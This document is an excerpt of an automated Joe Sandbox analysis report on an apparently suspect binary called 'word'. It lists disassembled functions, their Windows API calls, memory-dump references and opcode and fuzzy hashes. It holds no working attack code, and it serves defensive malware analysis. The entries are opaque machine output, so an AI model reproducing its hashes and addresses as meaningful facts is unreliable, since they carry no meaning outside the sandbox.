                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                            • String ID:
                                                                            • API String ID: 2338827641-0
                                                                            • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                            • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                            • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                            • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                            Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                            • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                            • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                            • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                            Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                            • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                            • DestroyIcon.USER32(?), ref: 0046FD58
                                                                            • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyIcon
                                                                            • String ID:
                                                                            • API String ID: 3419509030-0
                                                                            • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                            • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                            • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                            • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                            Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 004175AE
                                                                              • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                              • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                            • __amsg_exit.LIBCMT ref: 004175CE
                                                                            • __lock.LIBCMT ref: 004175DE
                                                                            • InterlockedDecrement.KERNEL32(?,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 004175FB
                                                                            • InterlockedIncrement.KERNEL32(001B2C50,0048C9D8,0000000C,00411498,00000000,?,004114D4,?,00000000), ref: 00417626
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                            • String ID:
                                                                            • API String ID: 4271482742-0
                                                                            • Opcode ID: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                            • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                            • Opcode Fuzzy Hash: 9041076209036267701916e3e7e7a5ecd924b858c75713c79b1599e88ef874d9
                                                                            • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                            Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$Icon
                                                                            • String ID:
                                                                            • API String ID: 4023252218-0
                                                                            • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                            • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                            • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                            • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                            Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                            • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                            • MessageBeep.USER32(00000000), ref: 0046036D
                                                                            • KillTimer.USER32 ref: 00460392
                                                                            • EndDialog.USER32 ref: 004603AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                            • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                            • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                            • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                            Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 1489400265-0
                                                                            • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                            • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                            • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                            • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                            Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                            • DestroyWindow.USER32 ref: 00455640
                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                            • DestroyWindow.USER32 ref: 00455678
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 1042038666-0
                                                                            • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                            • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                            • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                            • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                            Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                            • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                            • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                            • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                            Function 004140CF Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                            • ExitThread.KERNEL32 ref: 0041410F
                                                                            • GetCurrentThreadId.KERNEL32(00000000,?,00000000), ref: 00414115
                                                                            • __freefls@4.LIBCMT ref: 00414135
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 132634196-0
                                                                            • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                            • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                            • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                            • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                            Function 00415601 Relevance: 7.5, APIs: 5, Instructions: 23threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                              • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                            • __getptd_noexit.LIBCMT ref: 00415620
                                                                            • CloseHandle.KERNEL32(?), ref: 00415634
                                                                            • __freeptd.LIBCMT ref: 0041563B
                                                                            • ExitThread.KERNEL32 ref: 00415643
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3798957060-0
                                                                            • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                            • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                            • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                            • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                            Function 0041567F Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                              • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                              • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                              • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                            • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                              • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                              • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                            • ExitThread.KERNEL32 ref: 004156BD
                                                                            • __freefls@4.LIBCMT ref: 004156D9
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 1537469427-0
                                                                            • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                            • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                            • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                            • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                            Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _malloc
                                                                            • String ID: Default$|k
                                                                            • API String ID: 1579825452-2254895183
                                                                            • Opcode ID: 93aa395ff754088fbc9e0579b51342dee62b3b606854a7c6c0245429862da8b0
                                                                            • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                            • Opcode Fuzzy Hash: 93aa395ff754088fbc9e0579b51342dee62b3b606854a7c6c0245429862da8b0
                                                                            • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                            Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                            • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                            • CoUninitialize.OLE32 ref: 0046CE50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                            • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                            • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                            • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                            Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 176396367-557222456
                                                                            • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                            • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                            • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                            • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                            Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
